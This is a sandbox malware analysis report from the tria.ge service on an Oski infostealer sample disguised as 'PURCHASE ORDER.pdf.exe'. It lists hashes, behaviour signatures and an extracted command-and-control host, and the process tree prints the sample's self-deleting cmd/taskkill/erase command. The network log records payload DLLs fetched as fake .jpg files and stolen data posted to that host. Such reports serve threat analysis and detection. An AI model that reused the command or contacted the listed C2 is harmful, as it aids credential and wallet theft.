Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/09/2022, 22:30 UTC

General

  • Target

    PURCHASE ORDER.pdf.exe

  • Size

    273KB

  • MD5

    3304d0b6d7ce20ce511c4a90b76f3a3c

  • SHA1

    88195ea442c55fcf8e735c5525498e0b63107f0c

  • SHA256

    487723e00df8d7f8bfdb57614fa32001f2addc6be9576005b04f1dff53710634

  • SHA512

    130d5f5adbc5bcc4f64116e851249de7271c6ac34f706afe7e2aa9be62bfa680471c17c947806324ed1ab528cec511172f46b86ab2e7134ad4f44c948b286034

  • SSDEEP

    6144:EVP0JqJ1pemf6mr5GRNoQ0kk8MMXSZ7Vl9Fnog3Fpc9QI/3We:m0JqJe46fRNC3qSNf3ndrW/3We

Malware Config

Extracted

Family

oski

C2

� &C

v.oteqprojects.co.in

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.pdf.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.pdf.exe
      "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.pdf.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4316
      • C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.pdf.exe
        "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.pdf.exe"
        3⤵
        • Checks computer location settings
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious use of WriteProcessMemory
        PID:4180
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /pid 4180 & erase C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.pdf.exe & RD /S /Q C:\\ProgramData\\131513585834127\\* & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2236
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /pid 4180
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3172

Network

  • flag-us
    DNS
    v.oteqprojects.co.in
    PURCHASE ORDER.pdf.exe
    Remote address:
    8.8.8.8:53
    Request
    v.oteqprojects.co.in
    IN A
    Response
    v.oteqprojects.co.in
    IN A
    108.167.136.53
  • flag-us
    POST
    http://v.oteqprojects.co.in/6.jpg
    PURCHASE ORDER.pdf.exe
    Remote address:
    108.167.136.53:80
    Request
    POST /6.jpg HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: v.oteqprojects.co.in
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 22 Sep 2022 22:30:13 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Thu, 06 Jun 2019 07:01:52 GMT
    Accept-Ranges: bytes
    Content-Length: 144848
    Keep-Alive: timeout=5, max=75
    Content-Type: image/jpeg
  • flag-us
    POST
    http://v.oteqprojects.co.in/1.jpg
    PURCHASE ORDER.pdf.exe
    Remote address:
    108.167.136.53:80
    Request
    POST /1.jpg HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: v.oteqprojects.co.in
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 22 Sep 2022 22:30:17 GMT
    Server: Apache
    Last-Modified: Sun, 06 Aug 2017 22:52:20 GMT
    Accept-Ranges: bytes
    Content-Length: 645592
    Keep-Alive: timeout=5, max=74
    Connection: Keep-Alive
    Content-Type: image/jpeg
  • flag-us
    POST
    http://v.oteqprojects.co.in/2.jpg
    PURCHASE ORDER.pdf.exe
    Remote address:
    108.167.136.53:80
    Request
    POST /2.jpg HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: v.oteqprojects.co.in
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 22 Sep 2022 22:30:18 GMT
    Server: Apache
    Last-Modified: Thu, 06 Jun 2019 07:00:58 GMT
    Accept-Ranges: bytes
    Content-Length: 334288
    Keep-Alive: timeout=5, max=73
    Connection: Keep-Alive
    Content-Type: image/jpeg
  • flag-us
    POST
    http://v.oteqprojects.co.in/3.jpg
    PURCHASE ORDER.pdf.exe
    Remote address:
    108.167.136.53:80
    Request
    POST /3.jpg HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: v.oteqprojects.co.in
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 22 Sep 2022 22:30:19 GMT
    Server: Apache
    Last-Modified: Thu, 06 Jun 2019 07:01:20 GMT
    Accept-Ranges: bytes
    Content-Length: 137168
    Keep-Alive: timeout=5, max=72
    Connection: Keep-Alive
    Content-Type: image/jpeg
  • flag-us
    POST
    http://v.oteqprojects.co.in/4.jpg
    PURCHASE ORDER.pdf.exe
    Remote address:
    108.167.136.53:80
    Request
    POST /4.jpg HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: v.oteqprojects.co.in
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 22 Sep 2022 22:30:19 GMT
    Server: Apache
    Last-Modified: Thu, 06 Jun 2019 07:01:30 GMT
    Accept-Ranges: bytes
    Content-Length: 440120
    Keep-Alive: timeout=5, max=71
    Connection: Keep-Alive
    Content-Type: image/jpeg
  • flag-us
    POST
    http://v.oteqprojects.co.in/5.jpg
    PURCHASE ORDER.pdf.exe
    Remote address:
    108.167.136.53:80
    Request
    POST /5.jpg HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: v.oteqprojects.co.in
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 22 Sep 2022 22:30:20 GMT
    Server: Apache
    Last-Modified: Thu, 06 Jun 2019 07:01:44 GMT
    Accept-Ranges: bytes
    Content-Length: 1246160
    Keep-Alive: timeout=5, max=70
    Connection: Keep-Alive
    Content-Type: image/jpeg
  • flag-us
    POST
    http://v.oteqprojects.co.in/7.jpg
    PURCHASE ORDER.pdf.exe
    Remote address:
    108.167.136.53:80
    Request
    POST /7.jpg HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: v.oteqprojects.co.in
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 22 Sep 2022 22:30:21 GMT
    Server: Apache
    Last-Modified: Thu, 06 Jun 2019 07:02:02 GMT
    Accept-Ranges: bytes
    Content-Length: 83784
    Keep-Alive: timeout=5, max=69
    Connection: Keep-Alive
    Content-Type: image/jpeg
  • flag-us
    POST
    http://v.oteqprojects.co.in/main.php
    PURCHASE ORDER.pdf.exe
    Remote address:
    108.167.136.53:80
    Request
    POST /main.php HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: v.oteqprojects.co.in
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 22 Sep 2022 22:30:22 GMT
    Server: Apache
    Content-Length: 0
    Keep-Alive: timeout=5, max=68
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-us
    POST
    http://v.oteqprojects.co.in/
    PURCHASE ORDER.pdf.exe
    Remote address:
    108.167.136.53:80
    Request
    POST / HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 59734
    Host: v.oteqprojects.co.in
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 22 Sep 2022 22:30:23 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 56
    Keep-Alive: timeout=5, max=67
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    176.122.125.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    176.122.125.40.in-addr.arpa
    IN PTR
    Response
  • 93.184.220.29:80
    322 B
    7
  • 93.184.220.29:80
    322 B
    7
  • 108.167.136.53:80
    http://v.oteqprojects.co.in/
    http
    PURCHASE ORDER.pdf.exe
    176.2kB
    3.1MB
    2292
    2260

    HTTP Request

    POST http://v.oteqprojects.co.in/6.jpg

    HTTP Response

    200

    HTTP Request

    POST http://v.oteqprojects.co.in/1.jpg

    HTTP Response

    200

    HTTP Request

    POST http://v.oteqprojects.co.in/2.jpg

    HTTP Response

    200

    HTTP Request

    POST http://v.oteqprojects.co.in/3.jpg

    HTTP Response

    200

    HTTP Request

    POST http://v.oteqprojects.co.in/4.jpg

    HTTP Response

    200

    HTTP Request

    POST http://v.oteqprojects.co.in/5.jpg

    HTTP Response

    200

    HTTP Request

    POST http://v.oteqprojects.co.in/7.jpg

    HTTP Response

    200

    HTTP Request

    POST http://v.oteqprojects.co.in/main.php

    HTTP Response

    200

    HTTP Request

    POST http://v.oteqprojects.co.in/

    HTTP Response

    200
  • 52.109.13.63:443
    40 B
    1
  • 209.197.3.8:80
    322 B
    7
  • 51.116.253.168:443
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 8.8.8.8:53
    v.oteqprojects.co.in
    dns
    PURCHASE ORDER.pdf.exe
    66 B
    82 B
    1
    1

    DNS Request

    v.oteqprojects.co.in

    DNS Response

    108.167.136.53

  • 224.0.0.251:5353
    228 B
    4
  • 8.8.8.8:53
    176.122.125.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    176.122.125.40.in-addr.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\mozglue.dll

    Filesize

    133KB

    MD5

    8f73c08a9660691143661bf7332c3c27

    SHA1

    37fa65dd737c50fda710fdbde89e51374d0c204a

    SHA256

    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

    SHA512

    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

  • C:\ProgramData\nss3.dll

    Filesize

    1.2MB

    MD5

    bfac4e3c5908856ba17d41edcd455a51

    SHA1

    8eec7e888767aa9e4cca8ff246eb2aacb9170428

    SHA256

    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

    SHA512

    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

  • C:\ProgramData\sqlite3.dll

    Filesize

    630KB

    MD5

    e477a96c8f2b18d6b5c27bde49c990bf

    SHA1

    e980c9bf41330d1e5bd04556db4646a0210f7409

    SHA256

    16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

    SHA512

    335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

  • memory/4180-141-0x0000000000400000-0x0000000000438000-memory.dmp

    Filesize

    224KB

  • memory/4180-140-0x0000000000400000-0x0000000000438000-memory.dmp

    Filesize

    224KB

  • memory/4180-138-0x0000000000400000-0x0000000000438000-memory.dmp

    Filesize

    224KB

  • memory/4180-137-0x0000000000400000-0x0000000000438000-memory.dmp

    Filesize

    224KB

  • memory/4180-145-0x0000000000400000-0x0000000000438000-memory.dmp

    Filesize

    224KB

  • memory/4180-147-0x0000000000400000-0x0000000000438000-memory.dmp

    Filesize

    224KB

  • memory/4316-139-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/4316-135-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

  • memory/4316-133-0x0000000000400000-0x000000000043A000-memory.dmp

    Filesize

    232KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.